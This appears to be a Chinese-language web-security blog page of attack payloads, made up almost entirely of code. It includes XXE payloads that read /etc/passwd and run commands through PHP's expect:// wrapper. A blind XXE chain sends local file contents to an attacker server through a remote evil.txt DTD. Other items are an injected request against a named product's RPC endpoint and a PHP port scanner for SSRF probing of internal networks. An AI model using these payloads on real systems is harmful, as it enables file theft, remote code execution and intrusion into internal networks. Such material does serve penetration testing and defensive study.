XML External Entity (XXE) Processing
访问本地资源
1 2 3 4 5 6 7 8 9 10
|
$xml=<<<XML <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> XML; $data = simplexml_load_string($xml); print_r($data); ?>
|
远程代码执行,需要php开启expect
1 2 3 4 5 6 7 8
|
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <creds> <user>&xxe;</user> <pass>mypass</pass> </creds>
|
检测内网
1 2 3
|
<?xml version="1.0" ?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "http://192.168.1.2:8080/data" >]><foo>&xxe;</foo>
|
Tag Injection
内容注入
Blind XXE
嵌套远程实体
1 2 3 4 5 6 7 8
|
<?xml version="1.0"?> <!DOCTYPE ANY[ <!ENTITY % file SYSTEM "file:///C:/1.txt"> <!ENTITY % remote SYSTEM "http://192.168.150.1/evil.txt"> %remote; %all; %send; ]>
|
evil.txt
1
|
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.150.1/1.php?file=%file;'>">
|
Testing for XML Injection
打破xml格式使其报错
If ‘&’ is not encoded itself with &, it could be used to test XML injection.
https://github.com/xmendez/wfuzz/
实例
1 2 3
|
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true __type=updateData&__viewInstanceId=dorado.tabselfservice.FindBackStaticPWSvNewForReset~dorado.common.BaseViewModel&__xml=<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:////test" >]><foo>&xxe;</foo>&1518403736067
|
回显Payload
1 2 3 4 5 6 7 8 9 10
|
<!DOCTYPE ANY[ <!ENTITY xxe SYSTEM "/">]> <rpc method="noteInputCount"> <ps> <p name="user_code">1</p> </ps> <vps> <p name="DEFAULT_DATA_SOURCE">%26xxe;</p> </vps> </rpc>
|
SSRF (Server-Side Request Forgery)
内网端口探测
1 2 3 4 5 6 7 8 9 10 11 12
|
if(!$fp = fsockopen($host, intval($port), $errno, $errstr, 5)){ echo "$errno $errstrn"; } else{ echo "Port open.n"; if($fp){ fclose($fp); } } ?>
|
1 2 3 4 5 6 7 8
|
$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://www.example.com/"); curl_setopt($ch, CURLOPT_HEADER, 0); echo curl_exec($ch); curl_close($ch); ?>
|
XPath injection
XPath 使用路径表达式来选取 XML 文档中的节点或节点集。
近期评论